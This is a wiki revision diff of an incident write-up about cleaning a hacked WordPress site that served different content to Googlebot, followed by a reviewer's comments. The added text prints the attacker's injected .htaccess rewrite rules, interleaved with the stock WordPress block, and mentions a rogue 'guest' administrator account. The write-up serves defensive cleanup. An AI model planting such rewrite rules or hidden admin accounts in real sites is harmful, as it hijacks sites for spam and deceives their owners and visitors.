Differences

hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site [2017/07/04 16:10]
Mohammed AlShannaq
hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site [2017/07/04 17:11] (current)
Mohammed AlShannaq
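--- a/hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site
+++ b/hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site
@@ -19,3 +19,39 @@
 While analyzing the hacked website I Noticed that the there are a new user with user name "​guest"​ and administrator permission created recently. it look like its created with a wordpress bug or something like that. So I deleted the user guest.
 
-I notieced that the hacked WordPress site was Running Wordpress 4.7.5 so I also updated to the latest version WordPress version,
+I notieced that the hacked WordPress site was Running Wordpress 4.7.5 so I also updated to the latest version WordPress version
+
+
+Also I noticed that the hacker has been added the following code to the .htaccess file
+
+<​code>​
+<​IfModule mod_rewrite.c>​
+RewriteEngine On
+RewriteBase /
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+(.*)%(.*)[0-9]+%[0-9]+%([^\d\/​]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/​]+)(.*)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+$ ?​$10$8=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F[0-9]+&​.*=.*%[0-9]+(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F.*%[0-9]+F[0-9]+%[0-9]+F&​.*=.*_.*_.*&​.*_.*=.*&​.*=.*J.*YW.*I.*XR.*SI.*I.*R[0-9]+.*GU.*O.*J.*WN[0-9]+.*GV[0-9]+.*([0-9]+)I.*I.*N.*U.*O.*I.*M.*[0-9]+MTI[0-9]+I.*F.*I.*L([0-9]+)J.*YW[0-9]+.*I.*ZG[0-9]+.*I.*I.*N.*SI[0-9]+MS.*Y[0-9]+.*([0-9]+)I[0-9]+I.*R.*[0-9]+.*L([0-9]+)J.*ZSI[0-9]+MS.*Y.*[0-9]+.*I.*L([0-9]+)J.*[0-9]+.*O.*(.*).*I.*R.*I[0-9]+MX[0-9]+%[0-9]+([0-9]+)$ ?​$2$79=$88&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F[0-9]+.*&​.*=.*%[0-9]+(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F.*%[0-9]+F[0-9]+%[0-9]+F&​.*=.*_.*_.*&​.*_.*=.*&​.*=.*J.*YW.*I.*XR.*SI.*I.*R[0-9]+.*GU.*O.*J.*WN[0-9]+.*GV[0-9]+.*([0-9]+)I.*I.*N.*U.*O.*I.*M.*[0-9]+MTI[0-9]+I.*F.*I.*L([0-9]+)J.*YW[0-9]+.*I.*ZG[0-9]+.*I.*I.*N.*SI[0-9]+MS.*Y[0-9]+.*([0-9]+)I[0-9]+I.*R.*[0-9]+.*L([0-9]+)J.*ZSI[0-9]+MS.*Y.*[0-9]+.*I.*L([0-9]+)J.*[0-9]+.*O.*(.*).*I.*R.*I[0-9]+MX[0-9]+%[0-9]+([0-9]+)$ ?​$2$79=$88&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+\/​.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+\/​$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+\/​.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+\/​$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*W[0-9]+-V(.*)(.*)(.*).*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)R([^\d\/​]+).*-[0-9]+.*[0-9]+_.*[0-9]+X.*O[0-9]+QR.*O.*LQH.*U.*([0-9]+)L.*([^\d\/​]+)\/​.*[0-9]+\/​%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/​]+)[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+(.*)([0-9]+)%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/​]+)([0-9]+)%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+..*$ ?​$27$28=$25&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*S.*IOI\/​(.*)(.*)(.*)(.*)(.*)(.*)(.*)(.*)([0-9]+)L.*\/​.*U[0-9]+.*K[0-9]+.*R([^\d\/​]+).*Y.*Y.*[0-9]+U.*[0-9]+R.*K.*Q.*G.*F[0-9]+.*([0-9]+)(.*).*\/​.*[0-9]+\/​([0-9]+)[0-9]+.*([0-9]+)[0-9]+U[0-9]+(.*)(.*).*T.*..*$ ?​$21$33=$16&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*O.*R[0-9]+.*[0-9]+V.*MSK([0-9]+)[0-9]+.*([0-9]+)PZ.*Q.*U.*(.*)([0-9]+)L.*([^\d\/​]+)\/​.*[0-9]+\/​[0-9]+.*[0-9]+Y.*MW.*L._SX[0-9]+_([^\d\/​]+)O[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([0-9]+)[0-9]+_..*$ ?​$26$30=$11&​%{QUERY_STRING}[L]
+RewriteRule ^([^\d\/​]+)\/​([0-9]+)-([0-9]+)..*$ ?​$1$2=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^(.*)\/​([^\d\/​]+)\/​([0-9]+)_([0-9]+)..*$ ?​$2$4=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L]
+RewriteRule ^index\.php$ - [L]
+RewriteCond %{REQUEST_FILENAME} !-f
+RewriteCond %{REQUEST_FILENAME} !-d
+RewriteRule . /index.php [L]
+RewriteRule ^.*\/​([^\d\/​]+)\/​([0-9]+)-([0-9]+)\/​(.*)-.*\/​.*..*$ ?​$1$2=$3&​%{QUERY_STRING}[L]
+</​IfModule>​
+</​code>​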
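Review bot: The added `.htaccess` listing does not separate the attacker's rules from the stock WordPress block, and the text does not say what the file was restored to. The lines from `RewriteRule ^index\.php$ - [L]` to `RewriteRule . /index.php [L]`, together with `RewriteEngine On` and `RewriteBase /`, match the default WordPress rewrite block; every other `RewriteRule` appears to be injected. I would add a sentence after the `<code>` block saying so, and stating that the file was replaced with the default block if that is what was done. The injected rules only map crafted paths onto query-string parameters (`?$2$1=$3&%{QUERY_STRING}`), so presumably some PHP code elsewhere in the site consumes them. The page should record whether that code was found and removed, because cleaning `.htaccess`, deleting the `guest` administrator and updating WordPress would leave it in place. Wording on the new line: `the hacker has been added` should read `the attacker had added`.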